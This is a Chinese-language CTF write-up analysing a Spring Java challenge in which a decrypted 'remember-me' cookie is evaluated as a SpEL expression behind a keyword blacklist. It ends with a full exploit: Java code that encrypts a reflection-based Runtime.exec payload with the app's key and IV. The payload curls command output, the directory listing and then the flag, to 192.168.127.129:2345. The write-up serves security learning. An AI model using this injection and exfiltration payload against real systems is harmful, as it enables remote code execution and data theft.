java安全学习

java安全学习"/>

java安全学习

0x01.前言

最近在学习java安全，正好Code-Breaking系列有一道java代码审计相关的题目，这里详细分析一下这道题目，希望能和师傅们共同进步~

0x02.环境准备

需要反编译的jar包如下所示

直接通过以下步骤将jar文件导入到idea中，就可以获得源码文件 

如下所示我们就可以获得反编译后的几个重要的类和一些配置文件 

0x03.题目分析

主要的逻辑在MainController类中

BOOT-INF/classes/io/tricking/challenge/MainController.class:

@GetMappingpublic String admin(@CookieValue(value = "remember-me",required = false) String rememberMeValue, HttpSession session, Model model) {if (rememberMeValue != null && !rememberMeValue.equals("")) {String username = this.userConfig.decryptRememberMe(rememberMeValue);if (username != null) {session.setAttribute("username", username);}}Object username = session.getAttribute("username");if (username != null && !username.toString().equals("")) {model.addAttribute("name", this.getAdvanceValue(username.toString()));return "hello";} else {return "redirect:/login";}}

从这一段代码可以看到此时将从cookie中获取remember-me的值赋给rememberMeValue，若其不为空，则调用userconfig类中的decryptRememberMe对其进行解密，解密的逻辑在BOOT-INF\classes\io\tricking\challenge\UserConfig.class，其中加密和解密调用主要为以下两个函数 

而解密方法中用到了remembermekey，此key在application.yml中 

解密方法也是自己定义的一个类中实现的：

BOOT-INF\classes\io\tricking\challenge\Encryptor.class:

import java.util.Base64;import javax.crypto.Cipher;import javax.crypto.spec.IvParameterSpec;import javax.crypto.spec.SecretKeySpec;import org.slf4j.Logger;import org.slf4j.LoggerFactory;public class Encryptor {static Logger logger = LoggerFactory.getLogger(Encryptor.class);public Encryptor() {}public static String encrypt(String key, String initVector, String value) {try {IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");cipher.init(1, skeySpec, iv);byte[] encrypted = cipher.doFinal(value.getBytes());return Base64.getUrlEncoder().encodeToString(encrypted);} catch (Exception var7) {logger.warn(var7.getMessage());return null;}}public static String decrypt(String key, String initVector, String encrypted) {try {IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");cipher.init(2, skeySpec, iv);byte[] original = cipher.doFinal(Base64.getUrlDecoder().decode(encrypted));return new String(original);} catch (Exception var7) {logger.warn(var7.getMessage());return null;}}}

解密用到key，初始向量，以及密文，类SecretKeySpec根据提供的字节数组来生成指定算法的key，这里生成AES加密的密钥，类IvParameterSpec根据字节数组生成初始向量，Ciper类提供了java核心的加密解密算法体系，通过调用getInstance()方法我们就可以生成可以进行提供加密的对象，入口参数为我们需要使用的加密算法，以及对应的反馈模式以及填充模式，比如上面代码中的Cipher.getInstance("AES/CBC/PKCS5PADDING");，之后需要对该对象初始化，指定我们要进行的操作为加密或者解密，通过指定模式来定义，1为加密，2为解密，第二个参数即为密钥，第三个参数为我们指定的加密算法所需要的参数，AES加密需要初始的IV，这里我们传递一个IV进去，init初始结束以后，我们就可以进行解密操作，这里直接通过调用ciper.dofinal()方法来进行解密，然后返回字节数组存在original变量中转成字符串进行返回 

之后将从session中取出username，然后通过model.addAttribute()方法来设置model的键值，这里涉及到Spring MVC中Controller如何将数据返回给页面,要实现Controller返回数据给页面，Spring MVC 提供了以下几种途径：

ModelAndView：将视图和数据封装成ModelAndView对象，作为方法的返回值，数据最终会存到HttpServletRequest对象中

Model对象：通过给方法添加引用Model对象入参，直接往Model对象添加属性值。那么哪些类型的入参才能够引用Model对象，有三种类型，分别是org.springframework.ui.Model、org.springframework.ui.ModelMap 或 java.uti.Map。只要是这些类型的入参，都是指向Model对象的，而且不管定义多少个这些类型的入参都是指向同一个Model对象

@SessionAttributes：通过给Controller类添加@SessionAttributes注解，该注解的name和value属性值都是Model的key值，意思是指Model中这些key对应的数据也会存到HttpSession，不仅仅存到HttpServletRequest对象中，这样页面可以共享HttpSession中存的数据

@ModelAttribute：使用@ModelAttribute注解的方法会在此Controller每个方法执行前被执行，指定@ModelAttribute的name或value都是一样的功能，都是作为key，将注解的方法返回的对象作为value存放到Model中，不指定name和value的话，则以注解的方法返回的类型名称首字母小写作为key

除了上述的途径，也可以使用传统的方式，那就是直接使用HttpServletRequest或HttpSession对象来存数据，页面上再去取。

注意：Model中存的数据，最终都会存放到HttpServletRequest对象中，页面上可以通过HttpServletRequest对象获取数据。

而这里赋给name的值要经过getAdvanceValue()函数进行处理

首先定义var2变量为一些黑名单中的字符，然后通过循环判断解密以后的username中是否包含这些非法字符，这里通过正则来进行过滤，java正则表达式通过java.util.regex包下的Pattern类与Matcher类实现。

Pattern类用于创建一个正则表达式,也可以说创建一个匹配模式,它的构造方法是私有的,不可以直接创建,但可以通过Patternplie(String regex)简单工厂方法创建一个正则表达式，比如 

其中pattern() 返回正则表达式的字符串形式，也就是exec，所以这里就是将黑名单中的关键字依次进行字符串正则匹配，具体的黑名单在根据BOOT-INF/classes/io/tricking/challenge/KeyworkProperties.class中的定义可以在BOOT-INF/classes/application.yml中找到blacklist： 

find()对字符串进行匹配,匹配到的字符串可以在任何位置

通过Patternpile(keyword, 34).matcher(val)就能够对username值进行匹配，如果没有匹配到黑名单的话接下来就要进行spel处理，这里介绍一下spel。Spring Expression Language（简称 SpEL）是一种功能强大的表达式语言、用于在运行时查询和操作对象图；语法上类似于 Unified EL，但提供了更多的特性，特别是方法调用和基本字符串模板函数。

通常使用SPEL求表达式的值时可以分为以下几步：

1.创建解析器:Spel 使用 ExpressionParser 接口表示解析器，提供 SpelExpressionParser 默认实现

2.解析表达式:使用 ExpressionParser 的 parseExpression 来解析相应的表达式为 Expression 对象

其中var即为username的值，也就是我们可以注入的表达式，ParserContext 接口用于定义val所表示的字符串表达式是不是模板，及模板开始与结束字符，也就是我们注入的表达式以#{开头，以}结尾

3.构造上下文：准备比如变量定义等等表达式需要的上下文数据。

4.求值：通过 Expression 接口的 getValue 方法根据上下文获得表达式值。

至此为止，触发SPEL的基本逻辑我们已经清楚了，那么接下来只需要加payload进行加密，并赋给remember-me作为cookie发送即可，在构造payload之前我们需要知道spel是支持多种表达式的，我们通过通过Runtime.getruntime().exec()来执行命令，因此为了能够让spel执行exec()函数，我们可以使用类类型的表达式。使用T(Type)来表示java.lang.Class实例，"Type"必须是类全限定名，"java.lang"包除外，即该包下的类可以不指定包名，使用类类型表达式还可以进行访问类静态方法及类静态字段。

根据blacklist的过滤，我们不能直接执行 Runtime.getruntime().exec()，但是我们可以使用反射的方法来执行exec函数，这里要用到多次反射，spel表达式的payload格式如下所示 

我们知道通常一层反射有如下形式： 

其中test是一个类类型的对象，通过其我们可以访问类中定义的成员方法，Test是一个我们定义的类，我们想要执行该类的hack方法，通过以上三行就能够完成反射调用hack方法，其中23333为传入的hack方法的入口参数，回到Spel的payload的构造上，这里直接通过最外层的invoke函数来通过 

反射出一个Runtime对象来执行exec函数，其中反射runtime对象的过程中又使用了一个invoke()来调用getruntime函数，从而能够成功返回Runtime对象，并且此时invoke的第二个参数即为command，也就是我们需要传给exec进行执行的命令，这样就能够利用字符串拼接成功绕过blacklist的过滤来执行命令。

0x04.题目复现

因为exec执行命令是没有回显的，因此我们curl将结果带出，首先执行

这里直接执行ls / base64将出现\n，因此用tr将\n替换成任意base64编码表以外的字符即可 

因为源码中已经给出了encrypt方法，我们直接copy出来加密我们的payload即可

exp：

import javax.crypto.BadPaddingException;import javax.crypto.IllegalBlockSizeException;import javax.crypto.NoSuchPaddingException;import javax.crypto.spec.IvParameterSpec;import java.io.UnsupportedEncodingException;import java.security.InvalidAlgorithmParameterException;import java.security.InvalidKeyException;import java.security.NoSuchAlgorithmException;import java.util.Base64;import javax.crypto.Cipher;import javax.crypto.spec.SecretKeySpec;class Encryptor{public static String encrypt(String key, String initVector, String value){try {IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"),"AES");Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");cipher.init(1, skeySpec, iv);byte[] encrypted = cipher.doFinal(value.getBytes());return Base64.getUrlEncoder().encodeToString(encrypted);} catch (UnsupportedEncodingException e) {e.printStackTrace();} catch (NoSuchAlgorithmException e) {e.printStackTrace();} catch (NoSuchPaddingException e) {e.printStackTrace();} catch (InvalidKeyException e) {e.printStackTrace();} catch (InvalidAlgorithmParameterException e) {e.printStackTrace();} catch (IllegalBlockSizeException e) {e.printStackTrace();} catch (BadPaddingException e) {e.printStackTrace();}return null;}}public class Main {public static void main(String[] args) {System.out.println(Encryptor.encrypt("c0dehack1nghere1", "0123456789abcdef", "#{T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('ex'+'ec',T(String[])).invoke(T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(T(String).getClass().forName('java.la'+'ng.Ru'+'ntime')), new String[]{'/bin/bash','-c','curl 192.168.127.129:2345/`ls /|base64|tr \"\n\" \"-\"`'})}"));}}

burp中cookie添加remember-me的cookie 

 此时本地的2345端口将收到请求

此时解码就能看到flag文件了,此时只要继续加密curl 192.168.127.129:2345/`cat flag_j4v4_chun|base64`即可得到flag继续加密第二条command并发送cookie，解码后就能获得flag 

继续加密第二条command并发送cookie，解码后就能获得flag

0x05.总结

这道题涉及到spring spel表达式注入和payload构造中java反射，也学到了java开发中的很多东西，有兴趣的同学可以去复现

参考

.html

.html

别忘了投稿哦

大家有好的技术原创文章

欢迎投稿至邮箱：edu@heetian

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦

有才能的你快来投稿吧！

了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦！